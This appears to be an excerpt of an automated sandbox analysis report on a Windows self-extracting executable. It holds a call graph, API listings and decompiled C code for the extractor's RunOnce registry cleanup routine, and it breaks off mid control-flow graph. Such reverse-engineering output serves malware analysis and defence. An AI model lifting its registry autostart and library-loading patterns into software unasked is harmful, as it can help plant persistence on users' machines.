2995->2996 2997 a92381 2995->2997 2996->2997 2999 a922b1 RegQueryValueExA 2996->2999 2998 a96ce0 4 API calls 2997->2998 3000 a9238c 2998->3000 3001 a92374 RegCloseKey 2999->3001 3002 a922e6 memset GetSystemDirectoryA 2999->3002 3000->2670 3001->2997 3003 a9230f 3002->3003 3004 a92321 3002->3004 3006 a9658a CharPrevA 3003->3006 3005 a9171e _vsnprintf 3004->3005 3007 a9233f RegSetValueExA 3005->3007 3006->3004 3007->3001 3010 a91a9a 3009->3010 3012 a91aba 3010->3012 3014 a91aaf 3010->3014 3028 a9667f 3010->3028 3012->2907 3013 a9667f 2 API calls 3013->3014 3014->3012 3014->3013 3016 a92ad4 GetModuleFileNameA 3015->3016 3019 a92be6 3015->3019 3027 a92b02 3016->3027 3017 a96ce0 4 API calls 3020 a92bf5 3017->3020 3018 a92af1 IsDBCSLeadByte 3018->3027 3019->3017 3020->2925 3021 a92bca CharNextA 3024 a92bd3 CharNextA 3021->3024 3022 a92b11 CharNextA CharUpperA 3023 a92b8d CharUpperA 3022->3023 3022->3027 3023->3027 3024->3027 3026 a92b43 CharPrevA 3026->3027 3027->3018 3027->3019 3027->3021 3027->3022 3027->3024 3027->3026 3033 a965e8 3027->3033 3031 a96689 3028->3031 3029 a966a5 3029->3010 3030 a96648 IsDBCSLeadByte 3030->3031 3031->3029 3031->3030 3032 a96697 CharNextA 3031->3032 3032->3031 3034 a965f4 3033->3034 3034->3034 3035 a965fb CharPrevA 3034->3035 3036 a96611 CharPrevA 3035->3036 3037 a9660b 3036->3037 3038 a9661e 3036->3038 3037->3036 3037->3038 3039 a9663d 3038->3039 3040 a96634 CharNextA 3038->3040 3041 a96627 CharPrevA 3038->3041 3039->3027 3040->3039 3041->3039 3041->3040 3043 a94132 3042->3043 3045 a9412a 3042->3045 3046 a91ea7 3043->3046 3045->2982 3047 a91ed3 3046->3047 3048 a91eba 3046->3048 3047->3045 3049 a9256d 15 API calls 3048->3049 3049->3047 3051 a91ff0 RegOpenKeyExA 3050->3051 3052 a92026 3050->3052 3051->3052 3053 a9200f RegDeleteValueA RegCloseKey 3051->3053 3052->2320 3053->3052 3120 a919e0 3121 a91a03 3120->3121 3122 a91a24 GetDesktopWindow 3120->3122 3124 a91a16 EndDialog 3121->3124 3125 a91a20 3121->3125 3129 a943d0 6 API calls 3122->3129 3124->3125 3127 a96ce0 4 API calls 3125->3127 3128 a91a7e 3127->3128 3130 a94463 SetWindowPos 3129->3130 3132 a96ce0 4 API calls 3130->3132 3133 a91a33 LoadStringA SetDlgItemTextA MessageBeep 3132->3133 3133->3125 3134 a96a20 __getmainargs 3135 a969b0 3136 a969b5 3135->3136 3144 a96fbe GetModuleHandleW 3136->3144 3138 a969c1 __set_app_type __p__fmode __p__commode 3139 a969f9 3138->3139 3140 a96a0e 3139->3140 3141 a96a02 __setusermatherr 3139->3141 3146 a971ef _controlfp 3140->3146 3141->3140 3143 a96a13 3145 a96fcf 3144->3145 3145->3138 3146->3143 3147 a934f0 3148 a93504 3147->3148 3149 a935b8 3147->3149 3148->3149 3150 a9351b 3148->3150 3151 a935be GetDesktopWindow 3148->3151 3152 a93671 EndDialog 3149->3152 3153 a93526 3149->3153 3155 a9354f 3150->3155 3156 a9351f 3150->3156 3154 a943d0 11 API calls 3151->3154 3152->3153 3157 a935d6 3154->3157 3155->3153 3159 a93559 ResetEvent 3155->3159 3156->3153 3158 a9352d TerminateThread EndDialog 3156->3158 3161 a9361d SetWindowTextA CreateThread 3157->3161 3162 a935e0 GetDlgItem SendMessageA GetDlgItem SendMessageA 3157->3162 3158->3153 3160 a944b9 20 API calls 3159->3160 3163 a93581 3160->3163 3161->3153 3164 a93646 3161->3164 3162->3161 3165 a9359b SetEvent 3163->3165 3167 a9358a SetEvent 3163->3167 3166 a944b9 20 API calls 3164->3166 3168 a93680 4 API calls 3165->3168 3166->3149 3167->3153 3168->3149 3169 a96ef0 3170 a96f2d 3169->3170 3172 a96f02 3169->3172 3171 a96f27 ?terminate@ 3171->3170 3172->3170 3172->3171 3173 a97270 _except_handler4_common 3054 a94cc0 GlobalFree 3055 a96f40 SetUnhandledExceptionFilter 3174 a94bc0 3176 a94bd7 3174->3176 3177 a94c05 3174->3177 3175 a94c1b SetFilePointer 3175->3176 3177->3175 3177->3176 3178 a930c0 3179 a930de CallWindowProcA 3178->3179 3180 a930ce 3178->3180 3181 a930da 3179->3181 3180->3179 3180->3181 3182 a963c0 3183 a96407 3182->3183 3184 a9658a CharPrevA 3183->3184 3185 a96415 CreateFileA 3184->3185 3186 a96448 WriteFile 3185->3186 3187 a9643a 3185->3187 3188 a96465 CloseHandle 3186->3188 3190 a96ce0 4 API calls 3187->3190 3188->3187 3191 a9648f 3190->3191 3192 a93100 3193 a93111 3192->3193 3194 a931b0 3192->3194 3196 a93149 GetDesktopWindow 3193->3196 3200 a9311d 3193->3200 3195 a931b9 SendDlgItemMessageA 3194->3195 3198 a93141 3194->3198 3195->3198 3199 a943d0 11 API calls 3196->3199 3197 a93138 EndDialog 3197->3198 3201 a9315d 6 API calls 3199->3201 3200->3197 3200->3198 3201->3198 3202 a94200 3203 a9420b SendMessageA 3202->3203 3204 a9421e 3202->3204 3203->3204 3205 a96c03 3206 a96c1e 3205->3206 3207 a96c17 _exit 3205->3207 3208 a96c32 3206->3208 3209 a96c27 _cexit 3206->3209 3207->3206 3209->3208 3056 a94cd0 3057 a94d0b 3056->3057 3058 a94cf4 3056->3058 3059 a94d02 3057->3059 3062 a94dcb 3057->3062 3065 a94d25 3057->3065 3058->3059 3060 a94b60 FindCloseChangeNotification 3058->3060 3061 a96ce0 4 API calls 3059->3061 3060->3059 3064 a94e95 3061->3064 3063 a94dd4 SetDlgItemTextA 3062->3063 3066 a94de3 3062->3066 3063->3066 3065->3059 3079 a94c37 3065->3079 3066->3059 3084 a9476d 3066->3084 3069 a94e38 3069->3059 3071 a94980 25 API calls 3069->3071 3073 a94e56 3071->3073 3072 a94b60 FindCloseChangeNotification 3074 a94d99 SetFileAttributesA 3072->3074 3073->3059 3075 a94e64 3073->3075 3074->3059 3093 a947e0 LocalAlloc 3075->3093 3078 a94e6f 3078->3059 3080 a94c4c DosDateTimeToFileTime 3079->3080 3083 a94c88 3079->3083 3081 a94c5e LocalFileTimeToFileTime 3080->3081 3080->3083 3082 a94c70 SetFileTime 3081->3082 3081->3083 3082->3083 3083->3059 3083->3072 3102 a966ae GetFileAttributesA 3084->3102 3086 a9477b 3086->3069 3087 a947cc SetFileAttributesA 3088 a947db 3087->3088 3088->3069 3090 a96517 24 API calls 3091 a947b1 3090->3091 3091->3087 3091->3088 3092 a947c2 3091->3092 3092->3087 3094 a9480f LocalAlloc 3093->3094 3095 a947f6 3093->3095 3098 a94831 3094->3098 3101 a9480b 3094->3101 3096 a944b9 20 API calls 3095->3096 3096->3101 3099 a944b9 20 API calls 3098->3099 3100 a94846 LocalFree 3099->3100 3100->3101 3101->3078 3103 a94777 3102->3103 3103->3086 3103->3087 3103->3090 3104 a94ad0 3112 a93680 3104->3112 3107 a94ae9 3108 a94aee WriteFile 3109 a94b0f 3108->3109 3110 a94b14 3108->3110 3110->3109 3111 a94b3b SendDlgItemMessageA 3110->3111 3111->3109 3113 a93691 MsgWaitForMultipleObjects 3112->3113 3114 a936a9 PeekMessageA 3113->3114 3115 a936e8 3113->3115 3114->3113 3116 a936bc 3114->3116 3115->3107 3115->3108 3116->3113 3116->3115 3117 a936c7 DispatchMessageA 3116->3117 3118 a936d1 PeekMessageA 3116->3118 3117->3118 3118->3116 3210 a93210 3211 a9328e EndDialog 3210->3211 3212 a93227 3210->3212 3227 a93239 3211->3227 3213 a933e2 GetDesktopWindow 3212->3213 3214 a93235 3212->3214 3216 a943d0 11 API calls 3213->3216 3218 a932dd GetDlgItemTextA 3214->3218 3219 a9324c 3214->3219 3214->3227 3217 a933f1 SetWindowTextA SendDlgItemMessageA 3216->3217 3220 a9341f GetDlgItem EnableWindow 3217->3220 3217->3227 3228 a932fc 3218->3228 3243 a93366 3218->3243 3221 a93251 3219->3221 3222 a932c5 EndDialog 3219->3222 3220->3227 3223 a9325c LoadStringA 3221->3223 3221->3227 3222->3227 3225 a9327b 3223->3225 3226 a93294 3223->3226 3224 a944b9 20 API calls 3224->3227 3231 a944b9 20 API calls 3225->3231 3248 a94224 LoadLibraryA 3226->3248 3230 a93331 GetFileAttributesA 3228->3230 3228->3243 3234 a9337c 3230->3234 3235 a9333f 3230->3235 3231->3211 3233 a932a5 SetDlgItemTextA 3233->3225 3233->3227 3236 a9658a CharPrevA 3234->3236 3237 a944b9 20 API calls 3235->3237 3238 a9338d 3236->3238 3239 a93351 3237->3239 3240 a958c8 27 API calls 3238->3240 3239->3227 3241 a9335a CreateDirectoryA 3239->3241 3242 a93394 3240->3242 3241->3234 3241->3243 3242->3243 3244 a933a4 3242->3244 3243->3224 3245 a933c7 EndDialog 3244->3245 3246 a9597d 34 API calls 3244->3246 3245->3227 3247 a933c3 3246->3247 3247->3227 3247->3245 3249 a943b2 3248->3249 3250 a94246 GetProcAddress 3248->3250 3254 a944b9 20 API calls 3249->3254 3251 a9425d GetProcAddress 3250->3251 3252 a943a4 FreeLibrary 3250->3252 3251->3252 3253 a94274 GetProcAddress 3251->3253 3252->3249 3253->3252 3255 a9428b 3253->3255 3256 a9329d 3254->3256 3257 a94295 GetTempPathA 3255->3257 3261 a942e1 3255->3261 3256->3227 3256->3233 3258 a942ad 3257->3258 3258->3258 3259 a942b4 CharPrevA 3258->3259 3260 a942d0 CharPrevA 3259->3260 3259->3261 3260->3261 3262 a94390 FreeLibrary 3261->3262 3262->3256 3263 a94a50 3264 a94a9f ReadFile 3263->3264 3265 a94a66 3263->3265 3266 a94abb 3264->3266 3265->3266 3267 a94a82 memcpy 3265->3267 3267->3266 3268 a93450 3269 a9345e 3268->3269 3270 a934d3 EndDialog 3268->3270 3272 a9349a GetDesktopWindow 3269->3272 3276 a93465 3269->3276 3271 a9346a 3270->3271 3273 a943d0 11 API calls 3272->3273 3274 a934ac SetWindowTextA SetDlgItemTextA SetForegroundWindow 3273->3274 3274->3271 3275 a9348c EndDialog 3275->3271 3276->3271 3276->3275

                                                                                                                                                                                                        Callgraph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        • Opacity -> Relevance
                                                                                                                                                                                                        • Disassembly available
                                                                                                                                                                                                        callgraph 0 Function_00A92CAA 7 Function_00A918A3 0->7 12 Function_00A944B9 0->12 20 Function_00A9468F 0->20 30 Function_00A95C9E 0->30 31 Function_00A92390 0->31 42 Function_00A936EE 0->42 47 Function_00A96CE0 0->47 95 Function_00A96517 0->95 1 Function_00A92AAC 25 Function_00A91680 1->25 37 Function_00A965E8 1->37 1->47 62 Function_00A917C8 1->62 2 Function_00A966AE 3 Function_00A953A1 19 Function_00A9658A 3->19 3->25 3->47 91 Function_00A9171E 3->91 4 Function_00A96FA1 5 Function_00A955A0 5->12 5->19 5->20 21 Function_00A91781 5->21 26 Function_00A96285 5->26 5->47 78 Function_00A92630 5->78 5->95 104 Function_00A95467 5->104 107 Function_00A9597D 5->107 117 Function_00A96952 5->117 6 Function_00A94CA0 43 Function_00A917EE 7->43 7->47 8 Function_00A93BA2 8->12 8->20 8->21 8->26 34 Function_00A96495 8->34 35 Function_00A91AE8 8->35 39 Function_00A93FEF 8->39 8->47 70 Function_00A9202A 8->70 105 Function_00A92267 8->105 9 Function_00A972A2 10 Function_00A96FA5 113 Function_00A9724D 10->113 11 Function_00A91EA7 97 Function_00A9256D 11->97 12->25 12->47 59 Function_00A967C9 12->59 89 Function_00A9681F 12->89 12->91 13 Function_00A96FBE 119 Function_00A96F54 13->119 14 Function_00A969B0 14->13 40 Function_00A971EF 14->40 84 Function_00A97000 14->84 110 Function_00A96C70 14->110 15 Function_00A916B3 15->21 16 Function_00A952B6 16->21 16->31 16->37 44 Function_00A91FE1 16->44 16->47 17 Function_00A92A89 18 Function_00A9268B 18->12 18->47 18->91 19->15 22 Function_00A96380 23 Function_00A93680 24 Function_00A94980 24->12 106 Function_00A9487A 24->106 25->21 27 Function_00A91A84 108 Function_00A9667F 27->108 28 Function_00A94E99 28->25 29 Function_00A96298 29->47 29->91 30->12 30->19 30->25 46 Function_00A931E0 30->46 30->47 61 Function_00A966C8 30->61 71 Function_00A96E2A 30->71 94 Function_00A95C17 30->94 30->108 31->15 31->19 31->25 31->31 31->47 32 Function_00A91F90 32->11 32->12 32->47 33 Function_00A96793 34->19 34->21 34->47 35->1 35->12 35->15 35->19 35->21 35->25 35->27 35->47 35->61 35->91 36 Function_00A928E8 36->17 111 Function_00A92773 36->111 38 Function_00A970EB 39->12 39->26 39->47 87 Function_00A9411B 39->87 41 Function_00A96BEF 42->12 42->17 42->36 42->47 42->59 42->89 43->47 45 Function_00A94FE0 45->12 45->20 54 Function_00A94EFD 45->54 56 Function_00A96CF0 47->56 48 Function_00A924E0 48->19 48->47 49 Function_00A919E0 49->47 69 Function_00A943D0 49->69 50 Function_00A947E0 50->12 50->25 51 Function_00A951E5 51->12 51->20 51->26 52 Function_00A966F9 53 Function_00A92BFB 53->0 53->16 53->32 88 Function_00A92F1D 53->88 54->24 54->47 99 Function_00A94B60 54->99 55 Function_00A970FE 57 Function_00A934F0 57->12 57->23 57->69 58 Function_00A96EF0 59->33 60 Function_00A958C8 60->12 60->19 60->25 60->26 112 Function_00A96648 61->112 63 Function_00A94CC0 64 Function_00A94BC0 65 Function_00A930C0 66 Function_00A963C0 66->19 66->21 66->47 67 Function_00A94AD0 67->23 68 Function_00A94CD0 68->24 68->28 68->47 68->50 79 Function_00A94C37 68->79 86 Function_00A94702 68->86 98 Function_00A9476D 68->98 68->99 69->47 70->12 70->19 70->47 70->91 71->56 72 Function_00A97120 73 Function_00A96A20 74 Function_00A94224 74->12 74->25 75 Function_00A93B26 75->29 75->45 75->95 76 Function_00A93A3F 76->12 76->20 76->26 76->95 77 Function_00A96C3F 78->12 78->47 80 Function_00A97208 81 Function_00A9490C 82 Function_00A93100 82->69 83 Function_00A94200 85 Function_00A96C03 85->113 86->15 86->25 87->11 88->5 88->8 88->12 88->19 88->26 88->47 88->51 88->75 88->76 90 Function_00A9621E 88->90 96 Function_00A94169 88->96 88->97 103 Function_00A95164 88->103 89->47 89->52 90->12 90->26 90->47 90->107 92 Function_00A97010 93 Function_00A93210 93->12 93->19 93->60 93->69 93->74 93->107 95->12 96->12 96->20 97->48 98->2 98->95 100 Function_00A96A60 100->53 100->77 100->80 101 Function_00A97060 100->101 100->113 118 Function_00A97155 100->118 101->72 101->92 102 Function_00A96760 103->12 103->20 103->29 104->3 104->19 104->21 104->25 104->26 104->47 104->60 104->107 105->19 105->47 105->91 106->81 107->12 107->18 107->26 107->47 108->112 109 Function_00A97270 111->19 111->21 111->25 111->47 114 Function_00A96F40 115 Function_00A94A50 116 Function_00A93450 116->69 119->80 119->113

                                                                                                                                                                                                        Executed Functions

                                                                                                                                                                                                        Function 00A9202A Relevance: 42.2, APIs: 16, Strings: 8, Instructions: 185registrylibrarymemoryCOMMON
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        C-Code - Quality: 93%
                                                                                                                                                                                                        			E00A9202A(struct HINSTANCE__* __edx) {
				signed int _v8;
				char _v268;
				char _v528;
				void* _v532;
				int _v536;
				int _v540;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t28;
				long _t36;
				long _t41;
				struct HINSTANCE__* _t46;
				intOrPtr _t49;
				intOrPtr _t50;
				CHAR* _t54;
				void _t56;
				signed int _t66;
				intOrPtr* _t72;
				void* _t73;
				void* _t75;
				void* _t80;
				intOrPtr* _t81;
				void* _t86;
				void* _t87;
				void* _t90;
				_Unknown_base(*)()* _t91;
				signed int _t93;
				void* _t94;
				void* _t95;

				_t79 = __edx;
				_t28 =  *0xa98004; // 0x6298f871
				_v8 = _t28 ^ _t93;
				_t84 = 0x104;
				memset( &_v268, 0, 0x104);
				memset( &_v528, 0, 0x104);
				_t95 = _t94 + 0x18;
				_t66 = 0;
				_t36 = RegCreateKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0, 0, 0x2001f, 0,  &_v532,  &_v536); // executed
				if(_t36 != 0) {
					L24:
					return E00A96CE0(_t36, _t66, _v8 ^ _t93, _t79, _t84, _t86);
				}
				_push(_t86);
				_t87 = 0;
				while(1) {
					E00A9171E("wextract_cleanup0", 0x50, "wextract_cleanup%d", _t87);
					_t95 = _t95 + 0x10;
					_t41 = RegQueryValueExA(_v532, "wextract_cleanup0", 0, 0, 0,  &_v540); // executed
					if(_t41 != 0) {
						break;
					}
					_t87 = _t87 + 1;
					if(_t87 < 0xc8) {
						continue;
					}
					break;
				}
				if(_t87 != 0xc8) {
					GetSystemDirectoryA( &_v528, _t84);
					_t79 = _t84;
					E00A9658A( &_v528, _t84, "advpack.dll");
					_t46 = LoadLibraryA( &_v528); // executed
					_t84 = _t46;
					if(_t84 == 0) {
						L10:
						if(GetModuleFileNameA( *0xa99a3c,  &_v268, 0x104) == 0) {
							L17:
							_t36 = RegCloseKey(_v532);
							L23:
							_pop(_t86);
							goto L24;
						}
						L11:
						_t72 =  &_v268;
						_t80 = _t72 + 1;
						do {
							_t49 =  *_t72;
							_t72 = _t72 + 1;
						} while (_t49 != 0);
						_t73 = _t72 - _t80;
						_t81 = 0xa991e4;
						do {
							_t50 =  *_t81;
							_t81 = _t81 + 1;
						} while (_t50 != 0);
						_t84 = _t73 + 0x50 + _t81 - 0xa991e5;
						_t90 = LocalAlloc(0x40, _t73 + 0x50 + _t81 - 0xa991e5);
						if(_t90 != 0) {
							 *0xa98580 = _t66 ^ 0x00000001;
							_t54 = "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"";
							if(_t66 == 0) {
								_t54 = "%s /D:%s";
							}
							_push("C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\");
							E00A9171E(_t90, _t84, _t54,  &_v268);
							_t75 = _t90;
							_t23 = _t75 + 1; // 0x1
							_t79 = _t23;
							do {
								_t56 =  *_t75;
								_t75 = _t75 + 1;
							} while (_t56 != 0);
							_t24 = _t75 - _t79 + 1; // 0x2
							RegSetValueExA(_v532, "wextract_cleanup0", 0, 1, _t90, _t24); // executed
							RegCloseKey(_v532); // executed
							_t36 = LocalFree(_t90);
							goto L23;
						}
						_t79 = 0x4b5;
						E00A944B9(0, 0x4b5, _t51, _t51, 0x10, _t51);
						goto L17;
					}
					_t91 = GetProcAddress(_t84, "DelNodeRunDLL32");
					_t66 = 0 | _t91 != 0x00000000;
					FreeLibrary(_t84); // executed
					if(_t91 == 0) {
						goto L10;
					}
					if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
						E00A9658A( &_v268, 0x104, 0xa91140);
					}
					goto L11;
				}
				_t36 = RegCloseKey(_v532);
				 *0xa98530 = _t66;
				goto L23;
			}

































                                                                                                                                                                                                        0x00a9202a
                                                                                                                                                                                                        0x00a92035
                                                                                                                                                                                                        0x00a9203c
                                                                                                                                                                                                        0x00a92041
                                                                                                                                                                                                        0x00a92050
                                                                                                                                                                                                        0x00a9205f
                                                                                                                                                                                                        0x00a92064
                                                                                                                                                                                                        0x00a9206f
                                                                                                                                                                                                        0x00a9208c
                                                                                                                                                                                                        0x00a92094
                                                                                                                                                                                                        0x00a92257
                                                                                                                                                                                                        0x00a92266
                                                                                                                                                                                                        0x00a92266
                                                                                                                                                                                                        0x00a9209a
                                                                                                                                                                                                        0x00a9209b
                                                                                                                                                                                                        0x00a9209d
                                                                                                                                                                                                        0x00a920aa
                                                                                                                                                                                                        0x00a920af
                                                                                                                                                                                                        0x00a920c9
                                                                                                                                                                                                        0x00a920d1
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a920d3
                                                                                                                                                                                                        0x00a920da
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a920da
                                                                                                                                                                                                        0x00a920e2
                                                                                                                                                                                                        0x00a92103
                                                                                                                                                                                                        0x00a9210e
                                                                                                                                                                                                        0x00a92116
                                                                                                                                                                                                        0x00a92122
                                                                                                                                                                                                        0x00a92128
                                                                                                                                                                                                        0x00a9212c
                                                                                                                                                                                                        0x00a92179
                                                                                                                                                                                                        0x00a92194
                                                                                                                                                                                                        0x00a921de
                                                                                                                                                                                                        0x00a921e4
                                                                                                                                                                                                        0x00a92256
                                                                                                                                                                                                        0x00a92256
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a92256
                                                                                                                                                                                                        0x00a92196
                                                                                                                                                                                                        0x00a92196
                                                                                                                                                                                                        0x00a9219c
                                                                                                                                                                                                        0x00a9219f
                                                                                                                                                                                                        0x00a9219f
                                                                                                                                                                                                        0x00a921a1
                                                                                                                                                                                                        0x00a921a2
                                                                                                                                                                                                        0x00a921a6
                                                                                                                                                                                                        0x00a921a8
                                                                                                                                                                                                        0x00a921b0
                                                                                                                                                                                                        0x00a921b0
                                                                                                                                                                                                        0x00a921b2
                                                                                                                                                                                                        0x00a921b3
                                                                                                                                                                                                        0x00a921bc
                                                                                                                                                                                                        0x00a921c7
                                                                                                                                                                                                        0x00a921cb
                                                                                                                                                                                                        0x00a921f1
                                                                                                                                                                                                        0x00a921f6
                                                                                                                                                                                                        0x00a921fd
                                                                                                                                                                                                        0x00a921ff
                                                                                                                                                                                                        0x00a921ff
                                                                                                                                                                                                        0x00a92204
                                                                                                                                                                                                        0x00a92213
                                                                                                                                                                                                        0x00a92218
                                                                                                                                                                                                        0x00a9221d
                                                                                                                                                                                                        0x00a9221d
                                                                                                                                                                                                        0x00a92220
                                                                                                                                                                                                        0x00a92220
                                                                                                                                                                                                        0x00a92222
                                                                                                                                                                                                        0x00a92223
                                                                                                                                                                                                        0x00a92229
                                                                                                                                                                                                        0x00a9223d
                                                                                                                                                                                                        0x00a92249
                                                                                                                                                                                                        0x00a92250
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a92250
                                                                                                                                                                                                        0x00a921d2
                                                                                                                                                                                                        0x00a921d9
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a921d9
                                                                                                                                                                                                        0x00a9213a
                                                                                                                                                                                                        0x00a92141
                                                                                                                                                                                                        0x00a92144
                                                                                                                                                                                                        0x00a9214c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a92163
                                                                                                                                                                                                        0x00a92172
                                                                                                                                                                                                        0x00a92172
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00a92163
                                                                                                                                                                                                        0x00a920ea
                                                                                                                                                                                                        0x00a920f0
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • memset.MSVCRT ref: 00A92050
                                                                                                                                                                                                        • memset.MSVCRT ref: 00A9205F
                                                                                                                                                                                                        • RegCreateKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00000000,00000000,0002001F,00000000,?,?,?,?,?,?,00000000,00000000), ref: 00A9208C
                                                                                                                                                                                                          • Part of subcall function 00A9171E: _vsnprintf.MSVCRT ref: 00A91750
                                                                                                                                                                                                        • RegQueryValueExA.KERNELBASE(?,wextract_cleanup0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A920C9
                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A920EA
                                                                                                                                                                                                        • GetSystemDirectoryA.KERNEL32 ref: 00A92103
                                                                                                                                                                                                        • LoadLibraryA.KERNELBASE(?,advpack.dll,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A92122
                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,DelNodeRunDLL32), ref: 00A92134
                                                                                                                                                                                                        • FreeLibrary.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A92144
                                                                                                                                                                                                        • GetSystemDirectoryA.KERNEL32 ref: 00A9215B
                                                                                                                                                                                                        • GetModuleFileNameA.KERNEL32(?,00000104,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A9218C
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A921C1
                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A921E4
                                                                                                                                                                                                        • RegSetValueExA.KERNELBASE(?,wextract_cleanup0,00000000,00000001,00000000,00000002,?,?,?,?,?,?,?,?,?), ref: 00A9223D
                                                                                                                                                                                                        • RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A92249
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A92250
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.453037279.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.453020820.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453050867.0000000000A98000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.453062698.0000000000A9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_a90000_qu0t4ukLoN.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
                                                                                                                                                                                                        • String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup0
                                                                                                                                                                                                        • API String ID: 178549006-3765599613
                                                                                                                                                                                                        • Opcode ID: 7a8037fad7775c6b054094d6ca000f2678e5f79f26098919c2965051e077c554
                                                                                                                                                                                                        • Instruction ID: f841b6efb795bfe8219742bb1244300f354a4444d5ed182c06a81c93bb212e31
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7a8037fad7775c6b054094d6ca000f2678e5f79f26098919c2965051e077c554
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0C510775B00214BBDF20DBA4DC49FFB77BCEB55700F1002AAB909E6150DE759D4A8B90
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00A93BA2 Relevance: 40.6, APIs: 11, Strings: 12, Instructions: 308libraryloaderCOMMONCrypto
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 36 a93ba2-a93bd9 37 a93bdb-a93bee call a9468f 36->37 38 a93bfd-a93bff 36->38 46 a93d13-a93d30 call a944b9 37->46 47 a93bf4-a93bf7 37->47 39 a93c03-a93c28 memset 38->39 41 a93c2e-a93c40 call a9468f 39->41 42 a93d35-a93d48 call a91781 39->42 41->46 53 a93c46-a93c49 41->53 48 a93d4d-a93d52 42->48 58 a93f4d 46->58 47->38 47->46 51 a93d9e-a93db6 call a91ae8 48->51 52 a93d54-a93d6c call a9468f 48->52 51->58 69 a93dbc-a93dc2 51->69 52->46 65 a93d6e-a93d75 52->65 53->46 56 a93c4f-a93c56 53->56 61 a93c58-a93c5e 56->61 62 a93c60-a93c65 56->62 59 a93f4f-a93f63 call a96ce0 58->59 66 a93c6e-a93c73 61->66 67 a93c75-a93c7c 62->67 68 a93c67-a93c6d 62->68 71 a93d7b-a93d98 CompareStringA 65->71 72 a93fda-a93fe1 65->72 73 a93c87-a93c89 66->73 67->73 76 a93c7e-a93c82 67->76 68->66 74 a93dc4-a93dce 69->74 75 a93de6-a93de8 69->75 71->51 71->72 79 a93fe8-a93fea 72->79 80 a93fe3 call a92267 72->80 73->48 82 a93c8f-a93c98 73->82 74->75 81 a93dd0-a93dd7 74->81 77 a93f0b-a93f15 call a93fef 75->77 78 a93dee-a93df5 75->78 76->73 94 a93f1a-a93f1c 77->94 83 a93fab-a93fd2 call a944b9 LocalFree 78->83 84 a93dfb-a93dfd 78->84 79->59 80->79 81->75 87 a93dd9-a93ddb 81->87 88 a93c9a-a93c9c 82->88 89 a93cf1-a93cf3 82->89 83->58 84->77 92 a93e03-a93e0a 84->92 87->78 95 a93ddd-a93de1 call a9202a 87->95 90 a93c9e-a93ca3 88->90 91 a93ca5-a93ca7 88->91 89->51 93 a93cf9-a93d11 call a9468f 89->93 98 a93cb2-a93cc5 call a9468f 90->98 91->58 99 a93cad 91->99 92->77 100 a93e10-a93e19 call a96495 92->100 93->46 93->48 102 a93f1e-a93f2d LocalFree 94->102 103 a93f46-a93f47 LocalFree 94->103 95->75 98->46 112 a93cc7-a93ce8 CompareStringA 98->112 99->98 113 a93e1f-a93e36 